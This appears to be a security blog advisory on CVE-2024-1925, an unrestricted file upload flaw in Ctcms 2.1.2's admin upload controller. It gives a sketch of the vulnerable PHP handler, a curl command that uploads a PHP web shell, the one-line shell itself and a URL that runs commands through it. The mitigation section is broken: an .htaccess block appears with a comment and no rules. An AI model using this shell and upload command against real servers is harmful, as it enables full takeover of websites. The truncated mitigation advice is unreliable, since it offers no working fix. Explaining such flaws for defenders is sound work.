CVE-2024-1925 - Critical Unrestricted File Upload Vulnerability in Ctcms 2.1.2 (VDB-254860)

---

Introduction

A critical security issue has been discovered in Ctcms version 2.1.2 that could allow attackers to upload malicious files to the server remotely. Tracked as CVE-2024-1925 (also referenced as VDB-254860), this vulnerability could have a serious impact if exploited on a live site. In this post, we’ll break down what the vulnerability is, where it exists, how it can be exploited, and what mitigation steps you can take.

Product: Ctcms 2.1.2

- Component: ctcms/apps/controllers/admin/Upsys.php

Technical Details

The heart of the vulnerability sits in the file:
ctcms/apps/controllers/admin/Upsys.php

In Ctcms 2.1.2, improper validation of uploaded files in this controller can allow an attacker to upload arbitrary files (including PHP scripts), leading to remote code execution. This can result in full compromise of the system.

The affected upload handler does not adequately check the file type, extension, or content, enabling attackers to bypass intended restrictions.

Here’s a simplified version of what might be happening inside Upsys.php

// Inside Upsys.php file
public function upload_file()
{
    if(isset($_FILES['file'])){
        $filename = $_FILES['file']['name'];
        $temp_path = $_FILES['file']['tmp_name'];
        $destination = '/var/www/html/uploads/' . $filename;
        move_uploaded_file($temp_path, $destination);
        echo "File uploaded!";
    }
}

An attacker could upload webshell.php or even use double extensions (image.jpg.php).

- Once uploaded, the attacker could access the malicious file via the uploads folder (e.g., http://vulnerable-ctcms/uploads/webshell.php) and execute code.

Attack Scenario: Step by Step

1. Access Upload Feature: Attacker navigates to the vulnerable upload endpoint (may require authentication).

Prepare Payload: Attacker creates a simple PHP web shell or malicious script.

3. Upload Payload: Using the vulnerable upload form or an HTTP tool like curl, the attacker submits their malicious file.
4. Trigger Execution: By accessing the uploaded file URL, the attacker executes their code on the server.

Suppose the admin file upload endpoint is at

http://vulnerable-ctcms.com/admin/upsys/upload_file

Command to Upload a PHP Shell

curl -F "file=@webshell.php" http://vulnerable-ctcms.com/admin/upsys/upload_file

webshell.php contents

<?php system($_GET['cmd']); ?>

Access in browser

http://vulnerable-ctcms.com/uploads/webshell.php?cmd=whoami

Now you have full command execution on the server.

Exploit has already been published.

See VulDB entry and Exploit DB.
- CVSS Score: Critical (Usually 9.8/10)
- Why it matters: The attacker can gain full control of the web server by simply uploading a script.

`apache

# .htaccess in /uploads directory

References

- CVE-2024-1925 - NIST National Vulnerability Database
- VulDB Advisory VDB-254860
- Ctcms GitHub Project
- OWASP Unrestricted File Upload

Summary

CVE-2024-1925 is a serious unrestricted file upload vulnerability found in Ctcms 2.1.2’s admin upload system. It allows attackers to upload and execute malicious files, potentially resulting in complete compromise of the website or server. The published exploit means all exposed sites are at risk. Immediate action is necessary: upgrade, apply mitigations, and watch your logs.

Timeline

Published on: 02/27/2024 17:15:11 UTC
Last modified on: 02/29/2024 01:43:57 UTC